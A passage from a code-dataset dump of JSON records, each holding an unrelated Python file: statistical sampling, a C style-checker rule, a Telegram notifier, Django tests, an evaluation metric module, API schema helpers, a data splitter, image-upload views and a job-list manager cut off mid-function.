true_step2=False,\n true_step3=False, true_step4=False,\n true_step5=False, true_step6=False,print_info=False)\n samples[m] = new_para.copy()\n old_para = new_para.copy()\n if m%500 == 0:#print_info is True:\n print('iter -- '+str(m))\n if m == 50000:\n mcmc_thin_p1 = thin_MCMC(samples[:(m+1)], 50)\n with open(output+'_p1.pickle', 'wb') as f:\n pickle.dump(mcmc_thin_p1,f)\n if m == 100000:\n mcmc_thin_p2 = thin_MCMC(samples[:(m+1)], 50)\n with open(output+'_p2.pickle', 'wb') as f:\n pickle.dump(mcmc_thin_p2,f)\n if m == 150000:\n mcmc_thin_p3 = thin_MCMC(samples[:(m+1)], 50)\n with open(output+'_p3.pickle', 'wb') as f:\n pickle.dump(mcmc_thin_p3,f)\n\nprint('time spent on MCMC:'+str(time.time()-start)) \nprint('finished MCMC-------')\n\nmcmc_thin = thin_MCMC(samples, skip_size)\n\n# with open('sim_MCMC.pickle', 'wb') as f:\n# pickle.dump(mcmc_thin,f)\n\n \n###### prediction and performance ######\n\nstart = time.time()\nZ_post_pred = sample_post_Z(mcmc_thin,design_mat, L=500)\nprint(str(time.time()-start)+'s')\n\npred_score(Z_post_pred,Z,n,K) ## return a table of metrics\n\n\n\n\n","repo_name":"sstliao/BayesianGraph","sub_path":"test/example_test.py","file_name":"example_test.py","file_ext":"py","file_size_in_byte":6078,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"71"}
+{"seq_id":"9451518739","text":"from norminette.rules import Rule\n\n\nclass CheckBrace(Rule):\n def __init__(self):\n super().__init__()\n self.depends_on = [\"IsBlockStart\", \"IsBlockEnd\"]\n\n def run(self, context):\n \"\"\"\n C files must end with an empty line\n Functions can only have 25 lines\n \"\"\"\n i = 0\n i = context.skip_ws(i, nl=False)\n # if context.check_token(i, [\"RBRACE\", \"LBRACE\"]) is False and context.scope.type != \"GlobalScope\":\n # context.new_error(\"BRACE_EMPTY_LINE\")\n if context.check_token(i, [\"RBRACE\", \"LBRACE\"]) is False:\n context.new_error(\"EXPECTED_BRACE\", context.peek_token(i))\n return False, 0\n i += 1\n i = context.skip_ws(i, nl=False)\n if context.check_token(i, \"NEWLINE\") is True and context.check_token(i - 1, [\"SPACE\", \"TAB\"]):\n context.new_error(\"SPC_BEFORE_NL\", context.peek_token(i - 1))\n if context.check_token(i, \"NEWLINE\") is False or context.check_token(i, \"NEWLINE\") is None:\n if context.scope.name == \"UserDefinedType\" or context.scope.name == \"UserDefinedEnum\":\n i = context.skip_ws(i, nl=False)\n if context.check_token(i, \"SEMI_COLON\") is True:\n return False, 0\n if context.check_token(i, \"IDENTIFIER\") is False:\n context.new_error(\"BRACE_SHOULD_EOL\", context.peek_token(i - 1))\n else:\n i += 1\n if context.check_token(i, \"SEMI_COLON\") is False:\n context.new_error(\"BRACE_SHOULD_EOL\", context.peek_token(i - 1))\n else:\n context.new_error(\"BRACE_SHOULD_EOL\", context.peek_token(i - 1))\n if context.scope.name == \"Function\" and context.scope.lines > 26:\n context.new_error(\"TOO_MANY_LINES\", context.peek_token(0))\n return False, 0\n","repo_name":"42School/norminette","sub_path":"norminette/rules/check_brace.py","file_name":"check_brace.py","file_ext":"py","file_size_in_byte":1894,"program_lang":"python","lang":"en","doc_type":"code","stars":743,"dataset":"github-code","pt":"71"}
+{"seq_id":"16659583562","text":"import json\nimport logging\nfrom datetime import datetime as dt\nfrom backend.dbModels.order import Order\nfrom backend.dbModels.order import db\nfrom telebot import TeleBot\nfrom pathlib import Path\n\nfrom sqlalchemy import and_\n\n\ndef send_notification(message_data: Order | str) -> None:\n \"\"\"\n The function of sending a notification on an overdue order\n :param message_data: Expired order model or message to send\n :return:\n \"\"\"\n with open(Path(Path.cwd(), \"config\", \"config.json\"), 'r') as file:\n config_data = json.load(file)\n telegram_bot = TeleBot(config_data['telegram_bot_token'])\n if type(message_data) == Order:\n message_to_send = f\"Expired order {message_data}\"\n else:\n message_to_send = message_data\n for telegram_user_for_notification in config_data['telegram_users_for_notifications']:\n try:\n telegram_bot.send_message(telegram_user_for_notification, message_to_send)\n except Exception as ex:\n logging.warning(f\"Cannot send notification to user {telegram_user_for_notification} by order \"\n f\"{message_data.order_id}. {ex}\")\n\n\ndef send_notifications_of_overdue_orders() -> int:\n \"\"\"\n Function to receive expired orders and start sending notifications on them\n :return: Number of notifications sent\n \"\"\"\n today = dt.now().date()\n count_notifications = 0\n for order in db.session.query(Order).filter(and_(Order.delivery_time < today, Order.notification_is_send == False)):\n count_notifications += 1\n send_notification(order)\n order.notification_is_send = True\n db.session.commit()\n return count_notifications\n","repo_name":"Azrail6666/TestOrders","sub_path":"services/backend/backend/telegram_notifications.py","file_name":"telegram_notifications.py","file_ext":"py","file_size_in_byte":1676,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"71"}
+{"seq_id":"18309457214","text":"from django.core.exceptions import ObjectDoesNotExist\nfrom rest_framework import status\nfrom rest_framework.test import APITestCase\nfrom django.test.utils import override_settings\nfrom ..models import Product\n\n\nclass TestProduct(APITestCase):\n\n def setUp(self) -> None:\n Product.objects.create(\n name='an orange',\n price='100',\n discount_price='80',\n discount='20',\n type='fruits')\n\n @override_settings(DEBUG=False)\n def test_list(self):\n Product.objects.create(\n name='a tomato',\n price='100',\n discount_price='80',\n discount='20',\n type='vegetables')\n response = self.client.get('/products/')\n self.assertEqual(response.status_code, status.HTTP_200_OK)\n self.assertEqual(len(response.data), 2)\n\n def test_retrieve(self):\n ...\n\n def test_delete(self):\n response = self.client.delete('/products/1/')\n self.assertEqual(response.status_code, status.HTTP_204_NO_CONTENT)\n\n response = self.client.delete('/products/1/')\n self.assertEqual(response.status_code, status.HTTP_404_NOT_FOUND)\n\n # Product.objects.create(\n # name='an orange',\n # price='100',\n # discount_price='80',\n # discount='20',\n # type='fruits')\n\n with self.assertRaises(ObjectDoesNotExist, msg='Не найдено'):\n Product.objects.get(pk=2)\n\n\nclass TestCoupon(APITestCase):\n def test_not_allowed(self):\n not_allowed_methods = {\n 'POST': self.client.post,\n 'PUT': self.client.put,\n 'PATCH': self.client.patch,\n 'DELETE': self.client.delete\n }\n response = self.client.get('/coupons/')\n url = '/coupons/'\n for method_name, method in not_allowed_methods.items():\n self.assertNotEqual(\n response.status_code, status.HTTP_405_METHOD_NOT_ALLOWED,\n msg=f'Method {method_name} should be not allowed for url: {url}')","repo_name":"iavicha/Shop","sub_path":"shop_api/tests/test_views.py","file_name":"test_views.py","file_ext":"py","file_size_in_byte":2071,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"71"}
+{"seq_id":"73598515751","text":"##\nclass SingleBitHalfAdder:\n def __init__(self, A,B):\n self.A = A & 1\n self.B = B & 1\n\n def result(self):\n carry = self.A & self.B\n sum = self.A ^ self.B\n return carry, sum\n\nclass SinlgeBitFullAdder:\n def __init__(self,A,B,C):\n self.A = A&1\n self.B = B&1\n self.C = C&1\n\n def result(self):\n c, s = SingleBitHalfAdder(self.A, self.B).result()\n c, s = c | (s ^ self.C) , s ^ self.C \n return c, s\n\nclass Adder:\n @classmethod\n def add(self,a,b):\n MAX = 0x7FFFFFFF\n MIN = 0x80000000\n mask = 0xFFFFFFFF\n while b: a, b = (a^b) & mask, ((a&b)<<1) & mask\n return a if a <= MAX else ~(a ^ mask)\n\n\n##\n","repo_name":"izayoi-ami/algorithm","sub_path":"python/bitwise.py","file_name":"bitwise.py","file_ext":"py","file_size_in_byte":721,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"71"}
+{"seq_id":"73741596070","text":"from sentence_transformers.evaluation import SentenceEvaluator\nfrom sentence_transformers.util import cos_sim, dot_score\nimport logging\nimport numpy as np\nimport os\nimport csv\n\nimport torch\nfrom sklearn.metrics import average_precision_score\nimport tqdm\n\nlogger = logging.getLogger(__name__)\n\ndef gen_uniformity(res):\n res = res.squeeze()\n nres = torch.nn.functional.normalize(res.detach().cpu(),dim=1)\n uniform_loss = torch.pdist(nres,p=2).pow(2).mul(-2).exp().mean().tolist()\n return uniform_loss\n\nclass RerankingEvaluator(SentenceEvaluator):\n \"\"\"\n This class evaluates a SentenceTransformer model for the task of re-ranking.\n\n Given a query and a list of documents, it computes the score [query, doc_i] for all possible\n documents and sorts them in decreasing order. Then, MRR@10 and MAP is compute to measure the quality of the ranking.\n\n :param samples: Must be a list and each element is of the form: {'query': '', 'positive': [], 'negative': []}. Query is the search query,\n positive is a list of positive (relevant) documents, negative is a list of negative (irrelevant) documents.\n \"\"\"\n def __init__(self, samples, mrr_at_k: int = 10, name: str = '', write_csv: bool = True, similarity_fct=cos_sim, batch_size: int = 64, show_progress_bar: bool = False, use_batched_encoding: bool = True):\n self.samples = samples\n self.name = name\n self.mrr_at_k = mrr_at_k\n self.similarity_fct = similarity_fct\n self.batch_size = batch_size\n self.show_progress_bar = show_progress_bar\n self.use_batched_encoding = use_batched_encoding\n\n if isinstance(self.samples, dict):\n self.samples = list(self.samples.values())\n\n ### Remove sample with empty positive / negative set\n self.samples = [sample for sample in self.samples if len(sample['positive']) > 0 and len(sample['negative']) > 0]\n\n\n self.csv_file = \"RerankingEvaluator\" + (\"_\" + name if name else '') + \"_results.csv\"\n self.csv_headers = [\"epoch\", \"steps\", \"MAP\", \"MRR@{}\".format(mrr_at_k),\"F1\", \"q_uniformity\", \"d_uniformity\", \"P@20\"]\n self.write_csv = write_csv\n\n def __call__(self, model, output_path: str = None, epoch: int = -1, steps: int = -1) -> float:\n if epoch != -1:\n if steps == -1:\n out_txt = \" after epoch {}:\".format(epoch)\n else:\n out_txt = \" in epoch {} after {} steps:\".format(epoch, steps)\n else:\n out_txt = \":\"\n\n logger.info(\"RerankingEvaluator: Evaluating the model on \" + self.name + \" dataset\" + out_txt)\n\n\n scores = self.compute_metrices(model)\n mean_ap = scores['map']\n mean_mrr = scores['mrr']\n f1 = scores['f1']\n mean_q_unif = scores['mean_q_unif']\n mean_d_unif = scores['mean_d_unif']\n mean_prec = scores['mean_prec']\n #### Some stats about the dataset\n num_positives = [len(sample['positive']) for sample in self.samples]\n num_negatives = [len(sample['negative']) for sample in self.samples]\n\n logger.info(\"Queries: {} \\t Positives: Min {:.1f}, Mean {:.1f}, Max {:.1f} \\t Negatives: Min {:.1f}, Mean {:.1f}, Max {:.1f}\".format(len(self.samples), np.min(num_positives), np.mean(num_positives),\n np.max(num_positives), np.min(num_negatives),\n np.mean(num_negatives), np.max(num_negatives)))\n logger.info(\"MAP: {:.2f}; P@20 {:.2f}\".format(mean_ap * 100, mean_prec * 100))\n logger.info(\"MRR@{}: {:.2f}\".format(self.mrr_at_k, mean_mrr * 100))\n logger.info(\"F1: {:.2f}\".format(f1 * 100))\n logger.info(\"Query uniformity: {:.2f}, doc uniformity: {:.2f}\".format(mean_q_unif * 100, mean_d_unif * 100))\n\n #### Write results to disc\n if output_path is not None and self.write_csv:\n csv_path = os.path.join(output_path, self.csv_file)\n output_file_exists = os.path.isfile(csv_path)\n with open(csv_path, newline='', mode=\"a\" if output_file_exists else 'w', encoding=\"utf-8\") as f:\n writer = csv.writer(f)\n if not output_file_exists:\n writer.writerow(self.csv_headers)\n\n writer.writerow([epoch, steps, mean_ap, mean_mrr, f1, mean_q_unif, mean_d_unif, mean_prec])\n\n return mean_mrr\n\n def compute_metrices(self, model):\n return self.compute_metrices_batched(model) if self.use_batched_encoding else self.compute_metrices_individual(model)\n\n def compute_metrices_batched(self, model):\n \"\"\"\n Computes the metrices in a batched way, by batching all queries and\n all documents together\n \"\"\"\n all_mrr_scores = []\n all_ap_scores = []\n pos_doc_uniformity = []\n query_uniformity = []\n all_p_score = []\n all_query_features = model.encode([sample['query'] for sample in self.samples],\n convert_to_tensor=True,\n batch_size=self.batch_size,\n show_progress_bar=True,\n output_value = None) #self.show_progress_bar)\n\n \n all_query_embs = torch.stack([feature['sentence_embedding'] for feature in all_query_features], dim = 0)\n all_docs = []\n\n for sample in self.samples:\n all_docs.extend(sample['positive'])\n all_docs.extend(sample['negative'])\n\n all_doc_features = model.encode(all_docs,\n convert_to_tensor=True,\n batch_size=self.batch_size,\n show_progress_bar=self.show_progress_bar, output_value = None)\n \n all_docs_embs = torch.stack([feature['sentence_embedding'] for feature in all_doc_features], dim = 0)\n TP, FP, TN, FN = 0, 0, 0, 0\n\n #Compute scores\n query_idx, docs_idx = 0,0\n pos_docs_embs = []\n for instance in tqdm.tqdm(self.samples):\n query_emb = all_query_embs[query_idx]\n query_idx += 1\n\n num_pos = len(instance['positive'])\n num_neg = len(instance['negative'])\n docs_emb = all_docs_embs[docs_idx:(docs_idx+num_pos+num_neg)]\n pos_docs_embs.append(all_docs_embs[docs_idx:(docs_idx+num_pos)])\n\n docs_idx += num_pos + num_neg\n\n if num_pos == 0 or num_neg == 0:\n continue\n\n pred_scores = self.similarity_fct(query_emb, docs_emb)\n if len(pred_scores.shape) > 1:\n pred_scores = pred_scores[0]\n\n pred_scores_argsort = torch.argsort(-pred_scores) #Sort in decreasing order\n\n #Compute MRR score\n is_relevant = [True]*num_pos + [False]*num_neg\n mrr_score = 0\n for rank, index in enumerate(pred_scores_argsort[0:self.mrr_at_k]):\n if is_relevant[index]:\n mrr_score = 1 / (rank+1)\n break\n all_mrr_scores.append(mrr_score)\n\n prec = 0\n for rank, index in enumerate(pred_scores_argsort[0:20]):\n if is_relevant[index]:\n prec += 1\n break\n\n all_p_score.append(prec/20)\n # Compute AP\n all_ap_scores.append(average_precision_score(is_relevant, pred_scores.cpu().tolist()))\n query_classes = [torch.argmax(feature['class_pred']).tolist() for feature in all_query_features] # class 1\n doc_classes = [torch.argmax(feature['class_pred']).tolist() for feature in all_doc_features]# class 0\n for pred in query_classes:\n if pred == 0:\n TP += 1\n else:\n FN += 1\n\n for pred in doc_classes:\n if pred == 0:\n FP += 1\n else:\n TN += 1\n\n mean_ap = np.mean(all_ap_scores)\n mean_mrr = np.mean(all_mrr_scores)\n\n mean_q_unif = gen_uniformity(all_query_embs)\n mean_d_unif = gen_uniformity(torch.cat(pos_docs_embs,0))\n mean_prec = np.mean(all_p_score)\n prec = TP / (TP + FP + 0.0000001)\n recall = TP / (TP + FN + 0.0000001)\n f1 = 2 * prec * recall / (prec + recall + 0.0000001)\n return {'map': mean_ap, 'mrr': mean_mrr, 'f1': f1, 'mean_q_unif': mean_q_unif, 'mean_d_unif': mean_d_unif, 'mean_prec': mean_prec}\n\n\n def compute_metrices_individual(self, model):\n \"\"\"\n Embeds every (query, positive, negative) tuple individually.\n Is slower than the batched version, but saves memory as only the\n embeddings for one tuple are needed. Useful when you have\n a really large test set\n \"\"\"\n all_mrr_scores = []\n all_ap_scores = []\n TP, FP, TN, FN = 0, 0, 0, 0\n\n for instance in tqdm.tqdm(self.samples, disable=not self.show_progress_bar, desc=\"Samples\"):\n query = instance['query']\n positive = list(instance['positive'])\n negative = list(instance['negative'])\n\n if len(positive) == 0 or len(negative) == 0:\n continue\n\n docs = positive + negative\n is_relevant = [True]*len(positive) + [False]*len(negative)\n\n query_feature = model.encode([query], convert_to_tensor=True, batch_size=self.batch_size, show_progress_bar=False, output_value = None)\n docs_feature = model.encode(docs, convert_to_tensor=True, batch_size=self.batch_size, show_progress_bar=False, output_value = None)\n\n query_emb = query_feature['sentence_embedding']\n docs_emb = docs_feature['sentence_embedding']\n\n query_class = torch.argmax(query_feature['class_pred'], 1) # class 1\n doc_classes = torch.argmax(docs_feature['class_pred'], 1) # class 0\n\n for pred in query_class:\n if pred == 0:\n TP += 1\n else:\n FN += 1\n\n for pred in doc_classes:\n if pred == 0:\n FP += 1\n else:\n TN += 1\n\n pred_scores = self.similarity_fct(query_emb, docs_emb)\n if len(pred_scores.shape) > 1:\n pred_scores = pred_scores[0]\n\n pred_scores_argsort = torch.argsort(-pred_scores) #Sort in decreasing order\n\n #Compute MRR score\n mrr_score = 0\n for rank, index in enumerate(pred_scores_argsort[0:self.mrr_at_k]):\n if is_relevant[index]:\n mrr_score = 1 / (rank+1)\n break\n all_mrr_scores.append(mrr_score)\n\n # Compute AP\n all_ap_scores.append(average_precision_score(is_relevant, pred_scores.cpu().tolist()))\n\n mean_ap = np.mean(all_ap_scores)\n mean_mrr = np.mean(all_mrr_scores)\n prec = TP / (TP + FP)\n recall = TP / (TP + FN)\n f1 = 2 * prec * recall / (prec + recall + 0.0000001)\n return {'map': mean_ap, 'mrr': mean_mrr, \"f1\": f1}\n\n ","repo_name":"heshanxiu/beir_eval","sub_path":"src/evaluator.py","file_name":"evaluator.py","file_ext":"py","file_size_in_byte":11290,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"71"}
+{"seq_id":"75116518630","text":"N=int(input())\ni=2\ntemp=[]\ncount=None\nif N!=1:\n while i<=N:\n if N%i==0:\n temp.append(i)\n N//=i\n else:\n i+=1\nfor j in temp:\n print(j,end=\" \")\n","repo_name":"jes9401/algorithm_study","sub_path":"baekjoon/11653.py","file_name":"11653.py","file_ext":"py","file_size_in_byte":194,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"71"}
+{"seq_id":"35667015777","text":"from collections import OrderedDict\n\nfrom drf_yasg import openapi\nfrom drf_yasg.inspectors import SwaggerAutoSchema\nfrom rest_framework import serializers as drf_serializers\n\n\nclass CustomFieldsSerializer(drf_serializers.Serializer):\n \"\"\"\n 支持添加`自定义字段`的serializer\n \"\"\"\n\n def __init__(self, *args, **kwargs):\n # Don't pass the 'add_fields' arg up to the superclass\n add_fields = kwargs.pop(\"add_fields\", None)\n\n # Instantiate the superclass normally\n super().__init__(*args, **kwargs)\n\n if add_fields is not None:\n # Add 'add_fields' to fields\n self.fields.update(add_fields)\n\n\nclass ResponseSerializer(CustomFieldsSerializer):\n code = drf_serializers.IntegerField()\n result = drf_serializers.BooleanField()\n message = drf_serializers.CharField()\n\n\nclass PaginatedDataSerializer(CustomFieldsSerializer):\n count = drf_serializers.IntegerField()\n has_next = drf_serializers.BooleanField()\n has_previous = drf_serializers.BooleanField()\n\n\ndef get_response_serializer(data_field=None):\n \"\"\"\n 用于 drf-yasg swagger_auto_schema 获取标准的 response serializer\n \"\"\"\n add_fields = {\"data\": data_field} if data_field else {}\n return ResponseSerializer(add_fields=add_fields)\n\n\ndef get_paginated_response_serializer(results_field=None):\n\n \"\"\"\n 用于 drf-yasg swagger_auto_schema 获取标准翻页的 response serializer\n \"\"\"\n add_fields = {\"results\": results_field} if results_field else {}\n paginated_data_slz = PaginatedDataSerializer(add_fields=add_fields)\n return ResponseSerializer(add_fields={\"data\": paginated_data_slz})\n\n\nclass ResponseSwaggerAutoSchema(SwaggerAutoSchema):\n def get_response_schemas(self, response_serializers):\n responses = super().get_response_schemas(response_serializers)\n new_responses = OrderedDict()\n for sc, response in responses.items():\n new_responses[sc] = openapi.Response(\n description=response.get(\"description\", \"\"),\n schema=openapi.Schema(\n type=openapi.TYPE_OBJECT,\n properties=OrderedDict(\n (\n (\"code\", openapi.Schema(type=openapi.TYPE_INTEGER)),\n (\"result\", openapi.Schema(type=openapi.TYPE_BOOLEAN)),\n (\"message\", openapi.Schema(type=openapi.TYPE_STRING)),\n (\"data\", response.get(\"schema\")),\n )\n ),\n ),\n )\n return new_responses\n\n\nclass PaginatedResponseSwaggerAutoSchema(SwaggerAutoSchema):\n def get_response_schemas(self, response_serializers):\n responses = super().get_response_schemas(response_serializers)\n new_responses = OrderedDict()\n for sc, response in responses.items():\n new_responses[sc] = openapi.Response(\n description=\"\",\n schema=openapi.Schema(\n type=openapi.TYPE_OBJECT,\n properties=OrderedDict(\n (\n (\"code\", openapi.Schema(type=openapi.TYPE_INTEGER)),\n (\"result\", openapi.Schema(type=openapi.TYPE_BOOLEAN)),\n (\"message\", openapi.Schema(type=openapi.TYPE_STRING)),\n (\n \"data\",\n openapi.Schema(\n type=openapi.TYPE_OBJECT,\n properties=OrderedDict(\n (\n (\"count\", openapi.Schema(type=openapi.TYPE_INTEGER)),\n (\"results\", response[\"schema\"]),\n )\n ),\n ),\n ),\n )\n ),\n ),\n )\n return new_responses\n","repo_name":"Xmandon/bk-iam-saas","sub_path":"saas/backend/common/swagger.py","file_name":"swagger.py","file_ext":"py","file_size_in_byte":4094,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"71"}
+{"seq_id":"25874708398","text":"\"\"\"Code to split data into sets.\"\"\"\nimport abc\nfrom typing import Optional, Sequence, Union, Dict, Any, Tuple\n\nimport numpy as np\n\nfrom brain_pipe.pipeline.base import PipelineStep\nfrom brain_pipe.split.operations.base import SplitterOperation\n\n\nclass Splitter(PipelineStep, abc.ABC):\n \"\"\"Base class for splitting data into sets.\"\"\"\n\n def __init__(\n self,\n feature_mapping: Union[Dict[str, Any], Sequence[str], str],\n split_fractions: Sequence[Union[int, float]],\n split_names: Sequence[str],\n extra_operation: Optional[SplitterOperation] = None,\n axis=0,\n ):\n \"\"\"Create a splitter.\n\n Parameters\n ----------\n feature_mapping: Union[Dict[str, Any], Sequence[str], str]\n A mapping from the data key to the key of the data to split.\n split_fractions: Sequence[Union[int, float]]\n Fractions of the data to split into the different sets.\n split_names: Sequence[str]\n Names of the different sets.\n extra_operation: Optional[SplitterOperation]\n Operation to perform on the split data. If None, no operation is\n performed.\n axis: int\n Axis to split the data on.\n \"\"\"\n self.feature_mapping = self.parse_dict_keys(feature_mapping)\n self.split_fractions = self._normalize_split_fraction(split_fractions)\n self.split_names = split_names\n self.extra_operation = extra_operation\n self.axis = axis\n\n def _normalize_split_fraction(self, split_fractions):\n return [fraction / sum(split_fractions) for fraction in split_fractions]\n\n @abc.abstractmethod\n def split(\n self, data: Any, shortest_length: int, split_fraction: float, start_index: int\n ) -> Tuple[Any, int]:\n \"\"\"Split the data into sets.\n\n Parameters\n ----------\n data: Any\n Data to split.\n shortest_length: int\n Length of the shortest data.\n split_fraction: float\n Fraction of the data to split into the current set.\n start_index: int\n Index to start splitting the data from.\n\n Returns\n -------\n Any, int\n The split data and the index to start splitting the next data from.\n \"\"\"\n pass\n\n def __call__(self, data_dict):\n \"\"\"Split data into sets.\n\n Parameters\n ----------\n data_dict: Dict[str, Any]\n The data dict containing the data to split.\n\n Returns\n -------\n Dict[str, Any]\n The data dict containing the split data.\n \"\"\"\n shortest_length = min(\n [data_dict[key].shape[self.axis] for key in self.feature_mapping.keys()]\n )\n for from_key, to_key in self.feature_mapping.items():\n data = np.take(\n data_dict[from_key], np.arange(0, shortest_length), axis=self.axis\n )\n resulting_data = {}\n\n self.extra_operation.reset()\n start_index = 0\n for split_name, split_fraction in zip(\n self.split_names, self.split_fractions\n ):\n split_data, start_index = self.split(\n data, shortest_length, split_fraction, start_index\n )\n if self.extra_operation is not None:\n split_data = self.extra_operation(split_data)\n resulting_data[split_name] = split_data\n del data_dict[from_key]\n data_dict[to_key] = resulting_data\n\n return data_dict\n","repo_name":"exporl/brain_pipe","sub_path":"brain_pipe/split/base.py","file_name":"base.py","file_ext":"py","file_size_in_byte":3590,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"71"}
+{"seq_id":"23244706248","text":"from random import randint\n\nfrom cloudinary import uploader\nfrom cloudinary.templatetags import cloudinary\nfrom rest_framework import status, permissions\nfrom rest_framework.decorators import api_view, permission_classes\nfrom rest_framework.response import Response\n\nfrom attachments.models import Image\nfrom chat.models import Message, Chat\nfrom custom_auth.models import User\n\n\nclass ImageMixin:\n\n @staticmethod\n def upload_image_cloudinary(file, image_name):\n uploader.upload(\n file,\n public_id=image_name,\n )\n\n @staticmethod\n def post_cloudinary(request, obj):\n print(request.FILES)\n for file in request.FILES.values():\n image_name = '{0}_v{1}'.format(file.name.split('.')[0],\n randint(1000, 9999))\n ImageMixin.upload_image_cloudinary(file=file, image_name=image_name)\n image_url = cloudinary.utils.cloudinary_url(image_name)[0]\n image = Image(name=image_name, imageURL=image_url, content_object=obj)\n image.save()\n\n @staticmethod\n def can_change_photo(user, image):\n obj = image.content_object\n if obj.__class__ is Message:\n return obj.user == user\n elif obj.__class__ is Chat:\n return obj.creator == user\n elif obj.__class__ is User:\n return obj == user\n return False\n\n\n@api_view(['DELETE'])\n@permission_classes([permissions.IsAuthenticated])\ndef message_destroy_image(request, pk=None):\n \"\"\"\n Deletes message by its id\n\n :param request:\n :param pk:\n :return:\n \"\"\"\n try:\n image = Image.objects.get(pk=pk)\n except Image.DoesNotExist:\n return Response(status=status.HTTP_404_NOT_FOUND)\n user = request.user\n if not ImageMixin.can_change_photo(user, image):\n return Response(status=status.HTTP_403_FORBIDDEN)\n image.delete()\n return Response(status=status.HTTP_200_OK)\n","repo_name":"TrueChat/Backend","sub_path":"truechat/attachments/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1962,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"71"}
+{"seq_id":"37621206806","text":"import time, datetime, os, pickle, sys, re, traceback\n\n# Own modules:\nfrom tools import tools, JobNotFoundError, ActionCancelledError\nfrom files import Files\nfrom pdf_generator import MakePDF\nfrom interface import interface, start\nFiles.check_files()\n\nprint(\"\"\" \n ______ __ ______ __ __ \n /\\ ___\\ /\\ \\ /\\ __ \\ /\\ \\ _ \\ \\ \n \\ \\ __\\ \\ \\ \\____ \\ \\ \\/\\ \\ \\ \\ \\/ \".\\ \\ \n \\ \\_\\ \\ \\ \\ \\ \\_____\\ \\ \\__/\".~\\_\\ \n#####################################################################\n---------------------------------------------------------------------\n \"\"\")\n\nclass JobList:\n \"\"\" Class for managing jobs, Instance of this class is created in the last lines \"\"\"\n\n # Tehdään lista jossa säilytetään Jobit ajon aikana.\n def __init__(self):\n self.current_job_list = []\n self.info = None # Tähän haetaan info-objekti tiedostosta. Sisältää muuta infoa joka halutaan säilyttää\n self.history = None\n\n # Funktio jolla haetaan työt tiedostosta.\n def get_job_list_from_file(self):\n if os.path.getsize(\"current_job_list.txt\") > 0:\n with open(\"current_job_list.txt\", \"rb\") as f:\n self.current_job_list = pickle.load(f, fix_imports=False, encoding=\"ASCII\", errors=\"strict\")\n #Lisää tähän objektiin muualla tarvittavaa infoa\n self.info = self.current_job_list[0]\n\n # Funktio tiedoston päivitykseen.\n def write_pickle_file(self):\n with open(\"current_job_list.txt\", \"wb\") as f:\n pickle.dump(self.current_job_list, f, protocol=4, fix_imports=False)\n\n def get_hist(self):\n with open(\"hist_log.txt\", \"rb\") as f:\n hist = pickle.load(f, fix_imports=False, encoding=\"ASCII\", errors=\"strict\")\n return hist\n\n def copy_from_hist(self):\n hist = self.get_hist()\n job_to_copy = input(\"\\nType the the id of the job you wan't to copy: \")\n temp_job = None\n if job_to_copy.isdigit():\n job_to_copy = int(job_to_copy)\n else:\n print(\"\\n {} is not valid input. ID can only contain integers.\".format(id_to_remove))\n return\n\n for job in hist[1:]:\n if job.job_id == job_to_copy:\n temp_job = job\n temp_job.addedDate = datetime.datetime.now().strftime(\"%d-%m %H:%M\")\n temp_job.status = tools.get_valid_input(\"\\nGive new value for STATUS\", (\"1\",\"2\"))\n temp_job.job_id = self.info.current_id\n self.info.current_id += 1\n self.current_job_list.append(temp_job)\n break\n\n def write_hist(self, new_hist):\n with open(\"hist_log.txt\", \"wb\") as f:\n pickle.dump(new_hist, f, protocol=4, fix_imports=False)\n\n # Funktio töiden lisäämiseen. \n def add_job(self):\n\n print(\"\\n ENTERING NEW JOB\\n\")\n self.current_job_list.append(Job(tools.add_or_edit_job(None, self.info.current_id)))\n print(\"\\n Job {} added!\".format(self.info.current_id))\n self.info.current_id += 1\n\n def delete_job(self):\n \"\"\" Poistaa id:n perusteella valitun työn. \"\"\"\n id_to_remove = input(\"\\nType the ID of the Job you wan't to delete: \")\n\n if id_to_remove.isdigit():\n id_to_remove = int(id_to_remove)\n else:\n print(\"\\n {} is not valid input. ID can only contain integers.\".format(id_to_remove))\n return\n\n n = None\n for i in self.current_job_list[1:]:\n if i.job_id == id_to_remove:\n\n n = tools.get_valid_input(\"Are you sure you wan't to remove {} : {} : {} : {} : {} ?\".format(\"ID: \", i.job_id, i.customer, i.product, i.amount), (\"y\", \"n\")).lower()\n\n if n == \"y\":\n self.current_job_list.remove(i)\n i.status = (\"DELETED {}\".format(datetime.datetime.now().strftime(\"%d-%m-%Y %H:%M\")))\n #Tallennetaan hist_logiin poistettu työ\n temp_hist_log = self.get_hist()\n temp_hist_log.append(i)\n self.write_hist(temp_hist_log)\n print(\"\\n Job succesfully deleted!\")\n return\n\n elif n == \"n\":\n print(\"\\n Deletion cancelled!\")\n return\n \n print(\"\\n ID: {} NOT FOUND\".format(id_to_remove))\n\n def edit_job(self, n):\n # Katsotaan jos käyttäjä käyttää 'e#p' shortcutia, ja passataan parametri (tällä hetkellä vain p toimii) add_or_edit_job functiolle\n input_id = None\n suggestion = None\n if n == \"e\":\n suggestion = input(\"\\nType the ID of the job you wan't to edit: \")\n if suggestion.isdigit():\n input_id = int(suggestion)\n #except:\n # if input_id == \"q\":\n # break\n # print(input_id, \" is not a valid input. ID can only contain integers! (q to cancel): \")\n\n if len(n) > 1 and n[1:].isdigit():\n input_id = int(n[1:])\n\n parameter = None\n if len(n) > 2 and n[-1] == \"p\" and n[1:-1].isdigit():\n input_id = int(n[1:-1])\n parameter = n[-1]\n print(\"\\n Shortcut 'e#p' detected.\")\n\n for i in RUNNING_LIST.current_job_list[1:]:\n if i.job_id == input_id:\n index_of_the_job = self.current_job_list.index(i)\n # Tässä korvataan vanha objekti uudella vastaavalla (johon on vaihdettu haluttu parametri)\n self.current_job_list[index_of_the_job] = Job(tools.add_or_edit_job(i, None, parameter))\n return\n\n print(\"\\n ID {} NOT FOUND\".format(input_id))\n \n def show_list(self, job_list):\n\n if 